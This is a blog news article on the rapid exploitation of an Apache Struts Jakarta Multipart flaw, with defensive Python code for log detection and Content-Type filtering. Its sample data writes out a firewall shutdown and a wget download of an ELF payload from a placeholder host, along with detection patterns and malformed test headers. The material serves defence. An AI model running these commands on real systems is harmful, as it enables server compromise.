
Monday, July 17, 2017

Exploiting an Apache Struts vulnerability compromises web servers

Hackers managed to exploit a vulnerability in the open source Apache Struts development framework, even though a fix had been made available at the beginning of the week.



Between the disclosure of a vulnerability and its exploitation there is usually a delay, which gives developers time to release a security patch. That delay may be short, but it still leaves a window in which the fastest attackers can strike, as has unfortunately happened with the latest flaw in Apache Struts. Attackers have succeeded in exploiting the recently patched vulnerability in this open source development framework, which allows remote execution of malicious code on web servers.

On Monday, the Apache Struts developers fixed a high-severity vulnerability in the Jakarta Multipart parser. A few hours later, an exploit for the flaw appeared on Chinese-language websites, followed almost immediately by real attacks, according to researchers at Cisco Systems. The vulnerability is very easy to exploit and lets attackers execute system commands with the privileges of the user account that runs the web server process. If that process is configured to run as root, the system is completely compromised.


Shutting down the Linux firewall on command


Worse still, the Java web application running on the server does not even need to implement file upload through the Jakarta Multipart parser to be vulnerable. According to Qualys researchers, the mere presence of this component on the web server, and it is part of the Apache Struts framework by default, is enough for the exploit to work. Companies using this framework on their servers should upgrade to version 2.3.32 or 2.5.10.1 as soon as possible.

Cisco Talos researchers have observed a large number of exploitation events. Some of them only run the Linux whoami command to determine the privileges of the web server user. Others go further and shut down the Linux firewall before downloading an ELF executable to the server. "Payloads have varied but include an IRC bouncer, a DDoS bot and a sample linked to botnet bill portals", Talos researchers said in a blog post. Worldwide, there are 35 million web applications that accept the .action file type, and a large proportion of them are likely vulnerable.
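The post-exploitation behaviour Talos describes (the web server account running whoami, stopping the firewall, fetching an ELF binary) is visible on the host even when the malicious request itself is not logged. The following detection logic is an added example written for this article, not Cisco's or Apache's code; it runs over constructed, simplified process-execution records (timestamp|user|parent|command) rather than real audit-log output, and the set of web-server service accounts is an assumption.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

@dataclass
class ProcEvent:
    ts: str
    user: str
    parent: str   # parent process name
    cmd: str      # full command line

# Constructed sample records for this example (not real auditd/sysmon output).
# The first four lines model the chain described in the article: recon, firewall
# shutdown, download to /tmp, mark executable. The last two are benign noise.
SAMPLE_EVENTS = """\
2017-03-09T10:01:02Z|tomcat|java|/bin/sh -c whoami
2017-03-09T10:01:03Z|tomcat|java|/bin/sh -c service iptables stop
2017-03-09T10:01:05Z|tomcat|sh|/usr/bin/wget http://placeholder.invalid/payload.elf -O /tmp/.x
2017-03-09T10:01:06Z|tomcat|sh|/bin/chmod +x /tmp/.x
2017-03-09T10:02:00Z|root|systemd|/usr/sbin/cron -f
2017-03-09T10:02:10Z|alice|bash|/usr/bin/whoami
"""

# Assumption: the accounts the application server runs under in this environment.
WEB_USERS = {"tomcat", "www-data", "apache", "struts"}

SHELLS = re.compile(r"(^|/)(sh|bash|dash)\b")

# Each rule is a name plus a pattern matched against the command line of a
# process owned by a web-server account.
RULES = [
    ("recon-whoami", re.compile(r"\bwhoami\b")),
    ("firewall-disabled", re.compile(
        r"\b(iptables\s+-F|service\s+iptables\s+stop|systemctl\s+stop\s+firewalld|ufw\s+disable)\b")),
    ("download-to-tmp", re.compile(r"\b(wget|curl)\b.*\s/tmp/")),
    ("mark-executable-in-tmp", re.compile(r"\bchmod\s+\+?x.*\s/tmp/")),
]

def parse_events(text: str) -> List[ProcEvent]:
    """Parse the pipe-separated sample format into ProcEvent records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, parent, cmd = line.split("|", 3)
        events.append(ProcEvent(ts, user, parent, cmd))
    return events

def detect(events: List[ProcEvent]) -> List[Dict[str, str]]:
    """Return one alert per (event, rule) hit for processes owned by web-server accounts."""
    alerts = []
    for ev in events:
        if ev.user not in WEB_USERS:
            continue  # activity by other accounts is out of scope for these rules
        for name, pat in RULES:
            if pat.search(ev.cmd):
                alerts.append({"ts": ev.ts, "rule": name, "user": ev.user, "cmd": ev.cmd})
        # The app server (a java process) spawning a shell at all is itself a strong signal.
        if ev.parent == "java" and SHELLS.search(ev.cmd.split()[0]):
            alerts.append({"ts": ev.ts, "rule": "webserver-spawned-shell",
                           "user": ev.user, "cmd": ev.cmd})
    return alerts

def summarize(alerts: List[Dict[str, str]]) -> Dict[str, int]:
    """Count alerts per rule, the view an analyst triages first."""
    counts: Dict[str, int] = {}
    for a in alerts:
        counts[a["rule"]] = counts.get(a["rule"], 0) + 1
    return counts

if __name__ == "__main__":
    found = detect(parse_events(SAMPLE_EVENTS))
    for a in found:
        print(f'{a["ts"]} {a["rule"]:<24} {a["user"]:<8} {a["cmd"]}')
    print(summarize(found))
```

The rules are deliberately narrow (only the web-server account, only the actions the article reports); in practice the "java spawned a shell" rule carries most of the weight, because a Struts application has no legitimate reason to start /bin/sh, whereas whoami and chmod are routine for administrators.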

It is unusual to see attacks begin so quickly after a flaw is announced, and it has not yet been established whether the vulnerability was already being exploited in closed circles before Monday. Users who cannot apply the patches immediately can use a temporary workaround: a Servlet filter that checks the Content-Type header. Web application firewall rules that block these requests are also available from several vendors.
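The Servlet-filter workaround mentioned above works by refusing to let a malformed Content-Type header reach the Jakarta Multipart parser at all, which also addresses the point made earlier that an application is exposed even if it never uses file upload. The check below is an added example, not Apache's published filter or any vendor's WAF rule; it is written in Python so that it runs stand-alone, and a real deployment would carry the same logic in a Java `javax.servlet.Filter`. The boundary alphabet and the 256-byte length cap are this example's own assumptions, chosen to be stricter than RFC 2046 and RFC 7231 but wide enough for what browsers and HTTP libraries actually emit.

```python
import re
from typing import Dict, Optional

MAX_HEADER_LEN = 256  # assumption: far above anything a legitimate client sends

# Expression-language markers and call syntax have no place in a media-type header.
# Rejecting them up front means nothing downstream ever tries to interpret them.
SUSPICIOUS = re.compile(r"%\{|\$\{|[#()@]")

# Boundary alphabet: a subset of RFC 2046 bchars (no parentheses or spaces).
BOUNDARY = r"[A-Za-z0-9'+_,\-./:=?]{1,70}"
MULTIPART_RE = re.compile(
    r"^multipart/form-data\s*;\s*boundary=(\"?)" + BOUNDARY + r"\1\s*$",
    re.IGNORECASE,
)

# Ordinary "type/subtype; param=value" headers (e.g. JSON, form-urlencoded).
TOKEN = r"[A-Za-z0-9!&^_.+-]+"
PARAM = r"\s*;\s*" + TOKEN + r"=(?:\"[^\"]*\"|[^;\"\s]+)"
SIMPLE_RE = re.compile(r"^" + TOKEN + r"/" + TOKEN + r"(?:" + PARAM + r")*\s*$", re.IGNORECASE)

def content_type_is_acceptable(header: Optional[str]) -> bool:
    """Whitelist check: True only for headers the multipart parser can safely see."""
    if header is None:
        return True  # no Content-Type at all: the multipart parser is never invoked
    if len(header) > MAX_HEADER_LEN:
        return False
    if any(not 0x20 <= ord(c) <= 0x7E for c in header):
        return False  # control bytes or non-ASCII: header injection or obfuscation
    if SUSPICIOUS.search(header):
        return False
    media = header.split(";", 1)[0].strip().lower()
    if media == "multipart/form-data":
        # A multipart body without a well-formed boundary is malformed by definition.
        return MULTIPART_RE.match(header) is not None
    return SIMPLE_RE.match(header) is not None

def filter_request(headers: Dict[str, str]) -> Dict[str, object]:
    """Model of the filter's decision: pass clean requests, answer 400 otherwise.

    The rejection never echoes the offending header back to the client; it is
    logged server-side (not shown) for the incident responder instead.
    """
    ct = headers.get("Content-Type")
    if content_type_is_acceptable(ct):
        return {"action": "pass", "content_type": ct}
    return {"action": "reject", "status": 400, "reason": "malformed Content-Type header"}

# Constructed sample headers for this example: the first four are ordinary traffic,
# the rest are the kinds of malformed values the filter exists to stop.
SAMPLE_HEADERS = [
    None,
    "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    "application/json; charset=utf-8",
    "application/x-www-form-urlencoded",
    "%{placeholder-expression}",                   # expression marker in place of a media type
    "text/plain; charset=\"%{junk}\"",             # marker smuggled inside a parameter value
    "multipart/form-data; boundary=" + "A" * 120,  # over-long boundary
    "multipart/form-data; boundary=abc\r\nX-Injected: 1",  # CRLF / header injection
    "multipart/form-data",                         # multipart with no boundary at all
]

if __name__ == "__main__":
    for h in SAMPLE_HEADERS:
        verdict = "pass" if content_type_is_acceptable(h) else "REJECT"
        print(f"{verdict:<7} {h!r}")
```

Because this is a whitelist, a header the rules do not recognise is refused rather than passed through; when deploying such a filter, capture a day of legitimate Content-Type values first so that unusual but valid clients are added to the allowed grammar instead of being blocked.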
